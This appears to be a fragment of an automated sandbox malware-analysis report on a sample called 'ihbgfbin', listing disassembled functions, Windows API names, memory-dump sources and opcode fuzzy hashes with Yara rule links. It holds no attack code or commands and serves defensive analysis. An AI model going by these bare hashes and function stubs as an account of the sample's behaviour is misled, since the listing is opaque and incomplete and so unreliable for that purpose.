                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                                                    • Opcode ID: 837f219b6728fcde013bf3e737a97371eac9dbd3f4fc713871d196bddb624d78
                                                                                                                                                                                    • Instruction ID: 6140eec812d9471f850bc0fe068583e79b922bd59dde1fa513a59c5e4336affc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 837f219b6728fcde013bf3e737a97371eac9dbd3f4fc713871d196bddb624d78
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A319AB4D002189FCF14CFA9D984AAEFBB5AF49314F24942AE815B7300D775A945CF94
                                                                                                                                                                                    Function 001B997A Relevance: 1.3, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                    • Opcode ID: 8f33deed09ec74439ffdbf318c32ac8f0dc2dd8077a6a846d5e077f9b6cc4cb7
                                                                                                                                                                                    • Instruction ID: 2b1eef5bb655aaf3b7e192f0d3f1265e580a7e2f4ef854ea736bb663048420eb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f33deed09ec74439ffdbf318c32ac8f0dc2dd8077a6a846d5e077f9b6cc4cb7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D31BAB9D042189FCB10CFA9D884AEEFBF0AF49310F24905AE815B3310C774A945CF64
                                                                                                                                                                                    Function 001B8FB8 Relevance: 1.3, APIs: 1, Instructions: 75COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                    • Opcode ID: 66856ecf97ac73d7bbb221a89bc86fe2741ea6bd3cbcd3925ede2af5f9109faf
                                                                                                                                                                                    • Instruction ID: 5021e93dd84f2e5ad9ffed7730719cfde155296f7be1ec023147d57827289b91
                                                                                                                                                                                    • Opcode Fuzzy Hash: 66856ecf97ac73d7bbb221a89bc86fe2741ea6bd3cbcd3925ede2af5f9109faf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A31AAB4D042189FCF10CFA9D984AEEFBF4AB4A314F24906AE915B7310D374A945CFA5
                                                                                                                                                                                    Function 0016D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421666075.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_16d000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ffe8962890f7812caf46fe3c5fae04a616390221a0c7ca249bf947d2a7967d87
                                                                                                                                                                                    • Instruction ID: edeaa936adcd964ca4f2a2f908b4e42476c67e96e4b020e8a94ae4133bf398c2
                                                                                                                                                                                    • Opcode Fuzzy Hash: ffe8962890f7812caf46fe3c5fae04a616390221a0c7ca249bf947d2a7967d87
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9421C2B5A04240EFDB15CF14E9D0B26BBA5FB84314F24C5ADE8494B256C336D85ACB61
                                                                                                                                                                                    Function 0016D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421666075.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_16d000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 0ec48475966cffbcf21af511b4325280f7d5b206b0ccca5130688f379eaa7013
                                                                                                                                                                                    • Instruction ID: 7ad5fba05698fcee117c6953e84f88897ffb6b7fcfa625bd8efb3d14e5eee82a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ec48475966cffbcf21af511b4325280f7d5b206b0ccca5130688f379eaa7013
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1521B075A04240EFDB15CF14E884B26BB65EB84314F34C5A9E8494B246C736D857CBA1
                                                                                                                                                                                    Function 0016D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421666075.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_16d000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: d8f6b684a59049e0a2dc1e2a63ac764b6733c0b658a5d3c99be70f6e552dc11b
                                                                                                                                                                                    • Instruction ID: 315111a4de01c59cdbd2e149bae8089d9ff6c7dfebe28bc9b086e30af66c9fb6
                                                                                                                                                                                    • Opcode Fuzzy Hash: d8f6b684a59049e0a2dc1e2a63ac764b6733c0b658a5d3c99be70f6e552dc11b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 59218E755093808FDB02CF24D994B15BF71EB46314F28C5EAD8498F2A7C33AD81ACB62
                                                                                                                                                                                    Function 0016D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421666075.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_16d000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                                                                                                                                    • Instruction ID: 141c25bf80f1b53d939537fe1ca140e7b9ed01256c9d9760bc90249b175f6750
                                                                                                                                                                                    • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                                                                                                                                    • Instruction Fuzzy Hash: DF118B75A04280DFDB12CF14D9D4B25BBA1FB84314F28C6ADDC494B656C33AD85ACBA2

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 00740F60 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: !x1f
                                                                                                                                                                                    • API String ID: 0-27585904
                                                                                                                                                                                    • Opcode ID: 78cf3eda8a881a6d605dd9d6a1b8e6548de1f7d1d5e7fa219d4b76a25de02361
                                                                                                                                                                                    • Instruction ID: a362d2ad64cb3b948c608e9704a3742fd115cf897e3481e0ea9223ab76199c5c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 78cf3eda8a881a6d605dd9d6a1b8e6548de1f7d1d5e7fa219d4b76a25de02361
                                                                                                                                                                                    • Instruction Fuzzy Hash: BAE1D974E002598FDB14DFA9C5809AEBBF2FF89304F64816AD814AB35AD774AD41CF60
                                                                                                                                                                                    Function 00741398 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: P,V
                                                                                                                                                                                    • API String ID: 0-683960525
                                                                                                                                                                                    • Opcode ID: 9f1e9c5c02161a914c04e073b9148cfa47bdc5d88ad96fe88a8a13753fc5d7fd
                                                                                                                                                                                    • Instruction ID: 6eaf8d869bab1b9ed632a5bb4589b1e3cfd824c8e9199fc95b325c98f73b3a59
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f1e9c5c02161a914c04e073b9148cfa47bdc5d88ad96fe88a8a13753fc5d7fd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FE1D674E001598FCB14DFA9C5809AEBBF2FF89344F24816AD815AB35AD734AD41CFA1
                                                                                                                                                                                    Function 001B81F0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 1d2559b631c1695a4921fef33f1a07113099fd69f03cecb40b27751cb98e24c3
                                                                                                                                                                                    • Instruction ID: 02db9be8598b08b5772975cdb492d03e6f7231f53e27456874e214afbfad2f35
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d2559b631c1695a4921fef33f1a07113099fd69f03cecb40b27751cb98e24c3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 51E1D874E001598FDB14DFA9C5909ADBBF2FF89304F24816AD815AB356DB34AD41CFA0
                                                                                                                                                                                    Function 001B78F8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c9b9bad7b447f765c805fecea5d7f5e0db58277a219cb746b555f819a65d4469
                                                                                                                                                                                    • Instruction ID: ceb709bfd4dbee94d80b3ebd2f13606d8c82ac65483ccf990b6161ca9ac61ac4
                                                                                                                                                                                    • Opcode Fuzzy Hash: c9b9bad7b447f765c805fecea5d7f5e0db58277a219cb746b555f819a65d4469
                                                                                                                                                                                    • Instruction Fuzzy Hash: 38E1E574E042598FCB14DFA9C5909AEBBF2FF89304F24856AD814AB356D731AD41CFA0
                                                                                                                                                                                    Function 001B7D30 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 81755e20da0a9241493ff153a5954d32b5b04ca3938944ac3110a08f9a299627
                                                                                                                                                                                    • Instruction ID: cecc6ff7138151936e72816f238d206249cfcb5e1af213c9171f007cb8161c2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 81755e20da0a9241493ff153a5954d32b5b04ca3938944ac3110a08f9a299627
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FE1E674E042598FCB14DFA9C5909ADBBF2FF89344F24816AD814AB356D730AD42CFA0
                                                                                                                                                                                    Function 00742358 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c57e3ea48a4e4da18940d8c58071fe70a932308aab416e597dbe991d21e9b0e2
                                                                                                                                                                                    • Instruction ID: c982542aafba61d4bb74fe9f358349ba354cfcce8ad38d21e9f27e04adb5ecd9
                                                                                                                                                                                    • Opcode Fuzzy Hash: c57e3ea48a4e4da18940d8c58071fe70a932308aab416e597dbe991d21e9b0e2
                                                                                                                                                                                    • Instruction Fuzzy Hash: E8E1D874E001598FCB14DFA9C5809AEBBF2FF89304F64816AE814AB356D734AD52CF61
                                                                                                                                                                                    Function 00740B28 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: b081ebfc9adde5abb8960be5b6425185a75d8da3dc7467962eed456097e21a72
                                                                                                                                                                                    • Instruction ID: 30cf72eabb8573a1e0131ef81f4379e6a86f6162998e797d907abf8afea6eff1
                                                                                                                                                                                    • Opcode Fuzzy Hash: b081ebfc9adde5abb8960be5b6425185a75d8da3dc7467962eed456097e21a72
                                                                                                                                                                                    • Instruction Fuzzy Hash: B0E1EA74E001598FCB14DFA9C5809AEBBF2FF89304F24816AD914AB35AD735AD45CFA0
                                                                                                                                                                                    Function 00741880 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: b0166f0a205378549a41a4a9f0fa9723bd9fc7aea6e9cba14ce1e3de0db32ce0
                                                                                                                                                                                    • Instruction ID: 8841c21bff315b53fe365f6865906ed147b86361dd92195e9d0c871fb6590535
                                                                                                                                                                                    • Opcode Fuzzy Hash: b0166f0a205378549a41a4a9f0fa9723bd9fc7aea6e9cba14ce1e3de0db32ce0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 10E1E874E001598FCB14DFA9C580AAEBBF2FF89344F24816AD815AB35AD735AD41CF60
                                                                                                                                                                                    Function 001BA508 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: d7c7bd51be3c2cb429c6505c2e486fce8bf17f4aa4c2e2dc4b8159a307269a31
                                                                                                                                                                                    • Instruction ID: dc15bf516fbb859e0bdd0bc4fd440192a36eec919ddea28a5ad2f6ae2ad550ee
                                                                                                                                                                                    • Opcode Fuzzy Hash: d7c7bd51be3c2cb429c6505c2e486fce8bf17f4aa4c2e2dc4b8159a307269a31
                                                                                                                                                                                    • Instruction Fuzzy Hash: 747170B4E016188FCB08DFAAD9849DEFBF2BF88300F18C166D819AB215D7349942CF51
                                                                                                                                                                                    Function 001BA4F7 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 222238ab6b551c3a711ad99be571c89aa78b629fdc7c1b7a567a5fd50ef8f97b
                                                                                                                                                                                    • Instruction ID: 4ccad98feba290c2f291c099af0aa222158b0da4e4120c6b97c821f988904fbf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 222238ab6b551c3a711ad99be571c89aa78b629fdc7c1b7a567a5fd50ef8f97b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C518275E006588FDB08CFAAC98459EFBF2BF88300F18C06AD419AB315D7345946CF51

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:0.3%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                    Total number of Nodes:6
                                                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                                                    execution_graph 65704 db6c39 65705 db6c45 __except1 65704->65705 65707 dbee06 __vswprintf 65705->65707 65709 d5fea0 LdrInitializeThunk 65705->65709 65708 db6c66 __except1 65709->65708 65718 d5f900 LdrInitializeThunk

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 00D600C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                                                    Function 00D60048 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 13 d60048-d6005d LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                                                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                                                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                                                    Function 00D60078 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 14 d60078-d60090 LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                                                    Function 00D5F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1 d5f9f0-d5fa05 LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                                                    Function 00D5F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
